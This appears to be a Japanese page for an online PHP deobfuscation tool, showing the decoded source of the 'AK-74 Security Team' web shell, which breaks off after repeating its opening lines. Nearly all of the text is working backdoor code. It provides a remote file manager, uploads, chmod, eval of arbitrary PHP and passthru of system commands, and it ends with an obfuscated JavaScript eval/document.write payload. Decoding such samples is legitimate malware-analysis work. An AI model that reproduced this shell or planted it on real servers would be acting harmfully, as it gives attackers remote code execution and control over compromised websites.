Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php
$GLOBALS["iknpldrpigo"] = "content";
$GLOBALS["olmwrdqid"] = "timestart";
$GLOBALS["fdxvupxbx"] = "shell";
$hilzzmbb = "content";
$GLOBALS["shdxowcvsq"] = "fp";
$GLOBALS["kdhmhcnuk"] = "files";
$GLOBALS["hdyzecu"] = "number";
$GLOBALS["gyyylpy"] = "content";
$GLOBALS["cvvtiemv"] = "dirs";
$nfhhbmkrpia = "content";
$bcaxbgujhqyk = "content";
$GLOBALS["kqhombvoisgz"] = "xshell";
$GLOBALS["nwkrhqdzrcw"] = "res";
$GLOBALS["fzszjgc"] = "info";
$GLOBALS["fvyvgcirdxx"] = "path";
$GLOBALS["pgctubg"] = "perms";
$GLOBALS["kmdyudoev"] = "sec";
$GLOBALS["xcglkyuot"] = "dir";
$GLOBALS["hoyoqwd"] = "mas";
$GLOBALS["vtpgxuvxbi"] = "file";
$osezbewemuin = "content";
$GLOBALS["dwjodtpv"] = "handle";
$GLOBALS["wdyvqrczdgu"] = "i";
error_reporting(0);
$dbmeztzpbjd = "content";
@set_time_limit(0);
$yuabcquera = "xshell";
$fridqpc = "SERVER_";
session_start();
$wupyapffrye = "content";
$xshell = $SERVER_["PHP_SELF"];
class shell
{
function getfiles()
{
$GLOBALS["qzgebdlknl"] = "mas";
$qeosfvpx = "mas";
$mas = array();
$i = 0;
if ($handle = opendir($_SESSION["currentdir"])) {
$GLOBALS["qmdtpcoeduj"] = "handle";
$GLOBALS["zoaynvkz"] = "file";
while (false !== ($file = readdir($handle))) {
if ($file != "..") {
if (!is_dir($_SESSION["currentdir"] . "/" . $file)) {
$GLOBALS["sntlhgwvrnz"] = "file";
$GLOBALS["mpyjuxikn"] = "i";
$iwkugxydfbd = "file";
$qjtflnyw = "mas";
$nqlxlnj = "i";
$zibzmuilrsk = "i";
$mas[$i]["filename"] = $file;
$GLOBALS["nhauqglig"] = "mas";
$vpezessuwf = "i";
$mas[$i]["filesize"] = filesize($_SESSION["currentdir"] . "/" . $file);
$mas[$i]["lastmod"] = date("H.i/d.m.Y", filemtime($_SESSION["currentdir"] . "/" . $file));
$i++;
}
}
}
closedir($handle);
}
return $mas;
}
function getdirs()
{
$ovnbdybfxfn = "mas";
$GLOBALS["mscjpo"] = "mas";
$mas = array();
if ($handle = opendir($_SESSION["currentdir"])) {
$GLOBALS["hobugedqduo"] = "dir";
$GLOBALS["xwlfufyf"] = "handle";
while (false !== ($dir = readdir($handle))) {
$GLOBALS["iebmlxxk"] = "dir";
$qiwjehuaq = "dir";
$ulkfkgvahbq = "mas";
if ($dir != "." && is_dir($_SESSION["currentdir"] . "/" . $dir)) {
$mas[] = $dir;
}
}
closedir($handle);
}
return ${$ovnbdybfxfn};
}
function geturl()
{
if ($_SESSION["currentdir"] . "/" == $_SERVER["DOCUMENT_ROOT"]) {
return "/";
}
if (strpos($_SESSION["currentdir"], str_replace("\\", "/", $_SERVER["DOCUMENT_ROOT"])) === false) {
return "";
}
return str_replace($_SERVER["DOCUMENT_ROOT"], "", $_SESSION["currentdir"] . "/");
}
function removefile()
{
if (file_exists($_GET["file"])) {
chmod($_GET["file"], 0777);
if (unlink($_GET["file"])) {
return "File deleted!";
} else {
return "File deleted!";
}
} else {
return "File not found!";
}
}
function removedir()
{
chmod($_GET["dir"], 0777);
if (rmdir($_GET["dir"])) {
return "Directory deleted!";
} else {
return "Directory not found!";
}
}
function getmicrotime()
{
$GLOBALS["azoxuqxbstyx"] = "sec";
$nyzhvmuivi = "usec";
$GLOBALS["gpoxftmel"] = "usec";
list($usec, $sec) = explode(" ", microtime());
return (double) $usec + (double) $sec;
}
function getpermission($path)
{
$xienitv = "info";
$pmibkwbh = "info";
$qusckboendqg = "info";
$umyijesr = "info";
$sxhrms = "info";
$tynbdsso = "info";
$perms = fileperms($path);
$tyfxbbfd = "perms";
$qelozowxyjq = "perms";
$wuyjuf = "perms";
$qgfxtbdfnruf = "perms";
$siebgehypj = "info";
$pkgutlld = "perms";
$GLOBALS["uchwntfz"] = "info";
$GLOBALS["jckaac"] = "perms";
if (($perms & 0xc000) == 0xc000) {
$info = "s";
} elseif (($perms & 0xa000) == 0xa000) {
$info = "l";
} elseif (($perms & 0x8000) == 0x8000) {
$info = "-";
} elseif (($perms & 0x6000) == 0x6000) {
$info = "b";
} elseif (($perms & 0x4000) == 0x4000) {
$info = "d";
} elseif (($perms & 0x2000) == 0x2000) {
$info = "c";
} elseif (($perms & 0x1000) == 0x1000) {
$info = "p";
} else {
$info = "u";
}
$info .= $perms & 0x100 ? "r" : "-";
$info .= $perms & 0x80 ? "w" : "-";
$info .= $perms & 0x40 ? $perms & 0x800 ? "s" : "x" : ($perms & 0x800 ? "S" : "-");
${$qusckboendqg} .= $perms & 0x20 ? "r" : "-";
$fctqxhk = "info";
$info .= ${$tyfxbbfd} & 0x10 ? "w" : "-";
$info .= $perms & 0x8 ? $perms & 0x400 ? "s" : "x" : ($perms & 0x400 ? "S" : "-");
$GLOBALS["xqayvij"] = "perms";
$info .= $perms & 0x4 ? "r" : "-";
${$umyijesr} .= $perms & 0x2 ? "w" : "-";
${$tynbdsso} .= $perms & 0x1 ? $perms & 0x200 ? "t" : "x" : ($perms & 0x200 ? "T" : "-");
return ${$fctqxhk};
}
function getpermissionarray($path)
{
$iaorpkyboh = "res";
$GLOBALS["ffvutedscs"] = "perms";
$res = array();
$GLOBALS["mospvgr"] = "path";
$perms = fileperms($path);
$GLOBALS["secvlqatfohv"] = "perms";
$GLOBALS["bzngcqtouq"] = "perms";
$GLOBALS["aboxvtoyg"] = "perms";
$filvvij = "perms";
$GLOBALS["woyxpuac"] = "res";
$GLOBALS["mdbgzpglccyj"] = "perms";
$ccbjnaxobblr = "res";
$otymmkoxf = "res";
$fbhqupebtq = "res";
$GLOBALS["vdddnl"] = "res";
$gkufmuhelf = "res";
if (($perms & 0xc000) == 0xc000) {
$res[] = "s";
} elseif (($perms & 0xa000) == 0xa000) {
$res[] = "l";
} elseif (($perms & 0x8000) == 0x8000) {
$res[] = "-";
} elseif (($perms & 0x6000) == 0x6000) {
$res[] = "b";
} elseif (($perms & 0x4000) == 0x4000) {
$res[] = "d";
} elseif (($perms & 0x2000) == 0x2000) {
$res[] = "c";
} elseif (($perms & 0x1000) == 0x1000) {
$res[] = "p";
} else {
$res[] = "u";
}
$GLOBALS["nfmqqbwyhr"] = "perms";
$res[] = $perms & 0x100 ? "r" : "-";
$GLOBALS["rmhkov"] = "res";
$res[] = $perms & 0x80 ? "w" : "-";
$res[] = $perms & 0x40 ? $perms & 0x800 ? "s" : "x" : ($perms & 0x800 ? "S" : "-");
$res[] = $perms & 0x20 ? "r" : "-";
$res[] = $perms & 0x10 ? "w" : "-";
${$fbhqupebtq}[] = $perms & 0x8 ? ${$filvvij} & 0x400 ? "s" : "x" : ($perms & 0x400 ? "S" : "-");
$GLOBALS["gxyvyqrjw"] = "perms";
${$otymmkoxf}[] = $perms & 0x4 ? "r" : "-";
$eyjzgfr = "perms";
$res[] = $perms & 0x2 ? "w" : "-";
${$gkufmuhelf}[] = $perms & 0x1 ? $perms & 0x200 ? "t" : "x" : ($perms & 0x200 ? "T" : "-");
return ${$iaorpkyboh};
}
function outputhead()
{
$yeyubpcd = "res";
$res = "";
$res = "<html><head><title>AK-74 Security Team Web Shell</title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\"></head>\n<body>\n<STYLE>\nA:link {\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\n}\nA:active {\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\n}\nA:visited {\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\n}\nA:hover {\n\tCOLOR: #C10000; TEXT-DECORATION: underline\n}\nTD {\n\tFONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica\n}\nBODY {\n\tFONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica; SCROLLBAR-FACE-COLOR: #cccccc; SCROLLBAR-HIGHLIGHT-COLOR: #c10000; SCROLLBAR-SHADOW-COLOR: #c10000; SCROLLBAR-3DLIGHT-COLOR: #830000; SCROLLBAR-ARROW-COLOR: #c10000; SCROLLBAR-TRACK-COLOR: #eeeeee; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #830000; BACKGROUND-COLOR: #dcdcdc; \n}\n</STYLE>\n<div align=\"center\"><table border=1 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 2px solid\">\n <tr>\n <td colspan=7 align=\"center\">\n <b><font color=#830000 size=4>.:: :[ AK-74 Security Team Web-shell ]: \n::.</font></b>\n </td>\n </tr>";
return $res;
}
function outputmenu()
{
$eblbmi = "xshell";
$GLOBALS["omlmyuabmc"] = "res";
$jrizoflsr = "xshell";
$GLOBALS["kzvefdrkoqf"] = "res";
$res = "";
$txbsfjnhvi = "xshell";
$res .= "<tr>\n <td colspan=7 align=\"center\">\n <table border=0 cellspacing=0 cellpadding=0>\n <tr align=\"center\">\n\t <td width=150>\n\t <a href=\"" . $xshell . "?act=info\">General information</a>\n\t </td>\n\t <td width=150>\n\t <a href=\"" . $xshell . "?act=filemanager\">File manager</a>\n\t </td>\n\t <td width=80>\n\t <a href=\"" . $xshell . "?act=phpinfo\" target=\"_blank\">phpinfo()</a>\n\t </td>\n\t <td width=110>\n\t <a href=\"" . $xshell . "?act=execute\">Run PHP</a>\n\t </td>\n\t <td width=150>\n\t <a href=\"" . $xshell . "?act=exesys\">Execute the command</a>\n\t </td>\n </tr>\n </table>\n </td>\n </tr>";
return $res;
}
function outputdown()
{
$res = "";
$GLOBALS["srzeskty"] = "res";
$res = "</table></div></body></html>";
return $res;
}
function outputfilemanager()
{
$GLOBALS["udmmztjca"] = "xshell";
$GLOBALS["ychruqucrf"] = "xshell";
$powlcxkoeay = "files";
$shvztfinhxe = "dirs";
$ckrwmyieozcl = "res";
$GLOBALS["vmuyoysyoe"] = "res";
$GLOBALS["orpfxw"] = "res";
$GLOBALS["tuwswjh"] = "res";
$GLOBALS["acmzbxffk"] = "res";
$res = "";
$GLOBALS["vdtvfpbhyru"] = "number";
$uxuysqwhok = "files";
$number = 0;
$GLOBALS["sejtvw"] = "dirs";
$qflffdcxsrx = "i";
$dirs = $this->getdirs();
$files = $this->getfiles();
$GLOBALS["asxszifet"] = "i";
sort($dirs);
sort($files);
$res .= "\n <tr>\n <td colspan=7 align=\"center\">\n <font color=#830000> The current directory:</font><b><font color=#830000>" . $_SESSION["currentdir"] . "</font></b>\n </td>\n </tr>\n <tr align=\"center\">\n <td width=30>\n \n </td>\n <td width=330>\n \n </td>\n <td width=80><font color=#830000>,</font> <b><font color=#830000>byte</font></b>\n \n </td>\n <td width=120><font color=#830000>\n Recent change\n </font>\n </td>\n <td width=80 align=\"center\"><font color=#830000>Access right</font>\n \n </td>\n <td width=30>\n \n </td>\n <td width=30>\n \n </td>\n </tr>";
$kshyqqibce = "i";
$hjbbitpe = "res";
$GLOBALS["wyqypgtjmi"] = "i";
for ($i = 0; ${$qflffdcxsrx} < count(${$shvztfinhxe}); $i++) {
$GLOBALS["vapieoe"] = "res";
$wokhmi = "xshell";
$GLOBALS["uvckfgaxtwdw"] = "res";
$kwqcswqlscsg = "i";
$GLOBALS["wjjxsx"] = "xshell";
$GLOBALS["bbrtstbve"] = "dirs";
$GLOBALS["jeyjcbtlodsa"] = "dirs";
$GLOBALS["ywnqtawj"] = "i";
$GLOBALS["fxthzy"] = "dirs";
$res .= "<tr><td><b><font color=#830000>" . ++$number . "</font></b></td><td><b><a href=\"" . $xshell . "?act=filemanager&dir=" . $dirs[$i] . "\">" . $dirs[$i] . "</a></b></td><td> </td><td> </td><td>";
$res .= "<a href=\"" . $xshell . "?act=chmod&file=" . $_SESSION["currentdir"] . "/" . $dirs[$i] . "\">" . $this->getpermission($_SESSION["currentdir"] . "/" . $dirs[$i]) . "</a>";
$res .= "</td><td> </td><td><a href=\"" . $xshell . "?act=filemanager&act3=del&dir=" . $_SESSION["currentdir"] . "/" . $dirs[$i] . "\">delete</a></td></tr>";
}
for (${$kshyqqibce} = 0; $i < count($files); $i++) {
$GLOBALS["gkyyblyqymf"] = "i";
$fwvwil = "files";
$vdxzvdus = "res";
$gruvymtvqist = "xshell";
$GLOBALS["qwtxsjlqhhf"] = "files";
$evvwgjhmulxe = "files";
$GLOBALS["tefzqpvhph"] = "files";
$GLOBALS["omvsytrtatv"] = "i";
$GLOBALS["ypsmanoevl"] = "i";
$wpdhhfskcteg = "i";
$ihduysxmqju = "res";
$GLOBALS["tkghkgf"] = "res";
$res .= "<tr><td><b><font color=#830000>" . ++$number . "</font></b></td>";
$res .= "<td><a href=\"" . $xshell . "?act=down&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">" . $files[$i]["filename"] . "</a></td>";
$res .= "<td> " . $files[$i]["filesize"] . "</td>";
$khftnbmpvvs = "xshell";
$res .= "<td align=\"center\">" . $files[$i]["lastmod"] . "</td>";
$res .= "<td align=\"center\"><a href=\"" . $xshell . "?act=chmod&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">" . $this->getpermission($_SESSION["currentdir"] . "/" . $files[$i]["filename"]) . "</a></td>";
$tomphosfc = "res";
$res .= "<td align=\"center\"><a href=\"" . $xshell . "?act=edit&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">edit</a></td>";
$res .= "<td align=\"center\"><a href=\"" . $xshell . "?act=filemanager&act2=del&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">delete</a></td></tr>";
}
${$ckrwmyieozcl} .= "</table><br>";
$res .= "<table border=0 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 2px solid\">";
$pykgqvz = "res";
$res .= "<tr><td align=center><form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"mkdir\"><b><font color=#830000> :</b></font> </td><td><input type=\"text\" name=\"dircreate\"><input type=\"submit\" value=\"\"></form></td></tr>";
$res .= "<tr><td align=center><form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"createfile\"><b><font color=#830000> :</b></font></td><td> <input type=\"text\" name=\"filecreate\"><input type=\"submit\" value=\"\"></form></td></tr>";
$res .= "<tr><td align=center><form enctype=\"multipart/form-data\" action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"uploadfile\"><b><font color=#830000> :</font></b></td><td><input type=\"file\" name=\"filename\" size=\"23\"> <b><font color=#830000> </b></font></td><td> <input type=\"text\" name=\"filename2\"><input type=\"submit\" value=\"\"></form></td></tr>";
$res .= "<table border=0 width=\"700\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">";
${$hjbbitpe} .= "<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>";
return ${$pykgqvz};
}
function outputinfo()
{
$vbgcqwfncvvz = "res";
$myhjur = "res";
$res = "";
$res .= "<tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>General information about the server</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"left\"><br>\n <ol>\n <b><font color=#830000>1. OS - </font></b><font color=#830000>" . php_uname() . "</font><br><br>\n <b><font color=#830000>2. PHP - </font></b><font color=#830000>" . phpversion() . "</font><br><br>\n <b><font color=#830000>3.</font></b><font color=#830000> <b><font color=#830000>User</b></font> - " . get_current_user() . " <b><font color=#830000>|| User ID</font></b> - " . getmyuid() . " <b><font color=#830000>|| Group ID</b></font> - " . getmygid() . "</font><br><br>\n <b><font color=#830000>4. Server Software - </font></b><font color=#830000>" . getenv("SERVER_SOFTWARE") . "</font><br><br>\n <b><font color=#830000>5. Request Method - </font></b><font color=#830000>" . getenv("REQUEST_METHOD") . "</font><br><br>\n <b><font color=#830000>6. Server IP - </font></b><font color=#830000>" . getenv("SERVER_ADDR") . "</font><br><br>\n <b><font color=#830000>7. Your IP - </font></b><font color=#830000>" . getenv("REMOTE_ADDR") . "</font><br><br>\n\t<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>" . getenv("HTTP_X_FORWARDED_FOR") . "</font><br><br>\n</td>\n </tr>\n <table border=0 width=\"555\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">\n<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>";
return $res;
}
function chmodform($file)
{
$istixexbyxa = "file";
$nrugpeehr = "res";
$yvdvvaai = "i";
$GLOBALS["nwfedck"] = "perms";
$fewqjextf = "file";
$perms = $this->getpermissionarray($file);
$GLOBALS["ynokejbtuh"] = "perms";
$GLOBALS["ngqiunigukfh"] = "perms";
$uizdfjdf = "res";
$hammouvne = "i";
$GLOBALS["ykexebt"] = "res";
$GLOBALS["pefltgfgwzb"] = "i";
$res = "";
$res .= "<form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"chmod\">" . "<input type=\"hidden\" name=\"file\" value=\"" . $file . "\">\n <tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Changing access permissions</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0>";
$ftrxmefkqxh = "i";
$res .= "<tr align=\"center\"><td> </td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td></tr>";
$GLOBALS["yggjmwlv"] = "res";
$res .= "<tr><td><input type=\"hidden\" name=\"perms0\" value=\"" . $perms[0] . "\">" . $perms[0] . "</td>";
for ($i = 1; $i <= 9; $i++) {
$res .= "<td><input type=\"checkbox\" name=\"perms" . ${$ftrxmefkqxh} . "\"" . ($perms[${$yvdvvaai}] != "-" ? " checked" : "") . "></td>";
}
$res .= "</tr><tr><td colspan=10 align=\"right\"><input type=\"submit\" value=\"Save\"></td></tr>";
$res .= "</table></td></tr></form>";
return $res;
}
function editfileform($file)
{
$rwaotihpr = "fp";
$GLOBALS["wcqoifupsbh"] = "file";
$yyvjrmlhyubj = "fp";
$fp = fopen($file, "r");
if (!$fp) {
return " ";
}
$res = "";
$zeleyib = "res";
$hjrxrmu = "res";
$GLOBALS["ryysceaq"] = "res";
$GLOBALS["yjdeuf"] = "res";
$GLOBALS["kwyxxau"] = "file";
$res .= "<form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"editfile\">" . "<input type=\"hidden\" name=\"file\" value=\"" . $file . "\"><tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Edit the file</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0>";
$res .= "<tr><td><textarea rows=25 cols=100 name=\"filecontent\">" . htmlspecialchars(fread(${$rwaotihpr}, filesize($file))) . "</textarea></td></tr>";
$res .= "<tr><td align=\"right\"><b><font color=#830000>Rename:</font></b> <INPUT TYPE=TEXT NAME=rename size=100 maxlength=9999999 value=" . $file . "> - <input type=\"submit\" value=\"Edit\"></td></tr>";
$res .= "</table></td></tr></form>";
fclose(${$yyvjrmlhyubj});
return $res;
}
function executeform()
{
$GLOBALS["gbbivqermof"] = "xshell";
$GLOBALS["jcoxegkjqmx"] = "res";
$res = "";
$res .= "<form action=\"" . $xshell . "?act=execute\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"execute\">\n <tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Executing PHP code<br> Opening and closing PHP code ( <? ?> ) no need to write!</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=20 cols=80 name=\"phpcode\">";
$res .= "</textarea></td></tr><tr><td align=\"right\"><input type=\"submit\" value=\"\"></td></tr></table></td></tr>\n <table border=0 width=\"555\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">\n<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>";
return $res;
}
function execute()
{
echo "<hr>";
echo "<pre>";
eval(stripslashes($_POST["phpcode"]));
echo "</pre>";
echo "<hr>";
}
function exesysform()
{
$husxnjellv = "res";
$res = "";
$GLOBALS["lmwlmrqw"] = "res";
$GLOBALS["ubwopher"] = "res";
$res .= "<form action=\"" . $xshell . "?act=exesys\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"exesys\">\n <tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Execute system commands!</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=5 cols=80 name=\"cmmd\">";
$res .= "</textarea></td></tr><tr><td align=\"right\"><input type=\"submit\" value=\"Perform\"></td></tr></table></td></tr>\n <table border=0 width=\"555\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">\n<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"https://www.r57.gen.tr/\" title=\"r57.gen.tr\">r57.gen.tr</a> - <a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>";
return $res;
}
function exesys()
{
$GLOBALS["yvcpokfc"] = "result";
echo "<hr>";
echo "<pre>";
$result = passthru($_POST["cmmd"]);
echo "</pre>";
echo "<hr>";
}
function editfile($file)
{
if (!empty($_POST["rename"])) {
rename($_POST["file"], $_POST["rename"]);
}
$fp = fopen($_POST["rename"], "w");
if (!$fp) {
return 0;
}
fwrite($fp, stripslashes($_POST["filecontent"]));
fclose($fp);
return 1;
}
function chmodfile($file)
{
$tpmdfbgb = "res";
$ipjaivcsdnlk = "res";
$sgwdghqlhfy = "res";
$GLOBALS["pufgvr"] = "res";
$fcpofletrcs = "res";
$GLOBALS["ikiudyniptdh"] = "res";
$GLOBALS["lzykxw"] = "res";
$hlfwyxuk = "res";
$feixofkogs = "res";
$tulbauxmvcdt = "res";
$txyrsfflh = "res";
$res = 0;
$gorewqwudp = "res";
switch ($_POST["perms0"]) {
case "s":
$res |= 0xc000;
break;
case "l":
$res = ${$gorewqwudp} | 0xa000;
break;
case "-":
${$hlfwyxuk} |= 0x8000;
break;
case "b":
$res |= 0x6000;
break;
case "d":
$res |= 0x4000;
break;
case "c":
$res |= 0x2000;
break;
case "p":
$res |= 0x1000;
break;
case "u":
break;
}
$GLOBALS["xeomnnbyudw"] = "res";
if (isset($_POST["perms1"])) {
$res |= 0x100;
}
if (isset($_POST["perms2"])) {
$res = ${$tpmdfbgb} | 0x80;
}
if (isset($_POST["perms3"])) {
$res = ${$txyrsfflh} | 0x40;
}
if (isset($_POST["perms4"])) {
${$feixofkogs} = $res | 0x20;
}
if (isset($_POST["perms5"])) {
$res |= 0x10;
}
if (isset($_POST["perms6"])) {
$res = ${$tulbauxmvcdt} | 0x8;
}
if (isset($_POST["perms7"])) {
$res = ${$fcpofletrcs} | 0x4;
}
if (isset($_POST["perms8"])) {
$res |= 0x2;
}
if (isset($_POST["perms9"])) {
$res |= 0x1;
}
echo substr(sprintf("%o", $res), 4);
return chmod($file, intval(substr(sprintf("%o", $res), 4), 8));
}
function downloadfile($file)
{
$jehqknntr = "file";
header("Content-Type: application/octet-stream");
header("Content-Length: " . filesize($file));
header("Content-Disposition: attachment; filename={$file}");
readfile($file);
die;
}
function createdir()
{
if (!empty($_POST["dircreate"])) {
if (mkdir($_SESSION["currentdir"] . "/" . $_POST["dircreate"])) {
return "Directory created!";
}
}
return "Error creating directory";
}
function createfile()
{
if (!empty($_POST["filecreate"])) {
$GLOBALS["lwhsyzdtepf"] = "fp";
if (file_exists($_SESSION["currentdir"] . "/" . $_POST["filecreate"])) {
return " ";
}
$fp = fopen($_SESSION["currentdir"] . "/" . $_POST["filecreate"], "w");
if ($fp) {
$nwmcqdkwk = "fp";
fclose($fp);
return " !";
}
}
return "Error creating file";
}
function uploadfile()
{
if ($_FILES["filename"]["error"] != 0) {
return "121212";
}
$_POST["filename2"] = trim($_POST["filename2"]);
if (empty($_POST["filename2"])) {
$_POST["filename2"] = $_FILES["filename"]["name"];
}
if (!copy($_FILES["filename"]["tmp_name"], $_SESSION["currentdir"] . "/" . $_POST["filename2"])) {
if (!move_uploaded_file($_FILES["filename"]["tmp_name"], $_SESSION["currentdir"] . "/" . $_POST["filename2"])) {
return "File download failed...";
}
}
return "The file was uploaded successfully!";
}
}
$shell = new shell();
$timestart = $shell->getmicrotime();
$content = "";
if (!isset($_SESSION["currentdir"])) {
$_SESSION["currentdir"] = str_replace("\\", "/", $_SERVER["DOCUMENT_ROOT"]);
}
if (isset($_GET["dir"])) {
if (opendir(realpath($_SESSION["currentdir"] . "/" . $_GET["dir"]))) {
$_SESSION["currentdir"] = realpath($_SESSION["currentdir"] . "/" . $_GET["dir"]);
}
Header("Location: {$xshell}?act=filemanager");
}
$_SESSION["currentdir"] = str_replace("\\", "/", $_SESSION["currentdir"]);
$bxmeyfko = "content";
if (substr($_SESSION["currentdir"], 1, 1) == "/") {
$_SESSION["currentdir"] = substr($_SESSION["currentdir"], 0, 1);
}
$GLOBALS["lvsmiwfpysj"] = "content";
switch ($_POST["action"]) {
case "chmod":
if ($shell->chmodfile($_POST["file"])) {
${$GLOBALS["iknpldrpigo"]} .= "The change was successful";
}
break;
case "editfile":
if ($shell->editfile($_POST["file"])) {
${$wupyapffrye} .= "The edit was successful";
}
break;
case "execute":
$shell->execute();
break;
case "exesys":
$shell->exesys();
break;
case "mkdir":
${$GLOBALS["iknpldrpigo"]} .= $shell->createdir();
break;
case "createfile":
${$dbmeztzpbjd} .= $shell->createfile();
break;
case "uploadfile":
${$GLOBALS["iknpldrpigo"]} .= $shell->uploadfile();
break;
}
${$GLOBALS["iknpldrpigo"]} .= $shell->outputhead();
${$GLOBALS["iknpldrpigo"]} .= $shell->outputmenu();
switch ($_GET["act"]) {
case "edit":
${$GLOBALS["gyyylpy"]} .= $shell->editfileform($_GET["file"]);
break;
case "chmod":
${$GLOBALS["lvsmiwfpysj"]} .= $shell->chmodform($_GET["file"]);
break;
case "down":
${$GLOBALS["iknpldrpigo"]} .= $shell->downloadfile($_GET["file"]);
break;
case "filemanager":
if ($_GET["act2"] == "del") {
${$bxmeyfko} .= $shell->removefile();
}
${$GLOBALS["iknpldrpigo"]} .= $shell->outputfilemanager();
if ($_GET["act3"] == "del") {
${$hilzzmbb} .= $shell->removedir();
}
break;
case "phpinfo":
phpinfo();
die;
case "info":
${$bcaxbgujhqyk} .= $shell->outputinfo();
break;
case "execute":
${$GLOBALS["iknpldrpigo"]} .= $shell->executeform();
break;
case "exesys":
${$GLOBALS["iknpldrpigo"]} .= $shell->exesysform();
break;
}
${$GLOBALS["iknpldrpigo"]} .= $shell->outputdown();
echo ${$osezbewemuin};
echo "<center>Generation time: " . ($shell->getmicrotime() - ${$GLOBALS["olmwrdqid"]}) . "</center>";
echo "<script type=\"text/javascript\">\n<!-- \neval(unescape('%66%75%6e%63%74%69%6f%6e%20%70%34%32%64%38%63%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%32%31%30%38%35%35%37%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%38%35%36%31%36%32%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%37%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));\neval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%70%34%32%64%38%63%28%27') + '%30%6b%5b%62%63%6e%6e%11%69%6d%5d%30%19%64%6a%6a%60%32%2f%2b%78%75%76%26%6d%2c%35%20%67%57%66%20%6e%63%2d%74%5b%75%5e%67%74%2f%55%63%74%24%6b%69%1d%36%33%2a%69%5b%6c%6b%68%6a%3412108557%35%37%37%39%31%37%33' + unescape('%27%29%29%3b'));\n// -->\n</script>\n";<?php
$GLOBALS["iknpldrpigo"] = "content";
$GLOBALS["olmwrdqid"] = "timestart";
$GLOBALS["fdxvupxbx"] = "shell";
$hilzzmbb = "content";
$GLOBALS["shdxowcvsq"] = "fp";
$GLOBALS["kdhmhcnuk"] = "files";
$GLOBALS["hdyzecu"] = "number";
$GLOBALS["gyyylpy"] = "content";
$GLOBALS["cvvtiemv"] = "dirs";
$nfhhbmkrpia = "content";
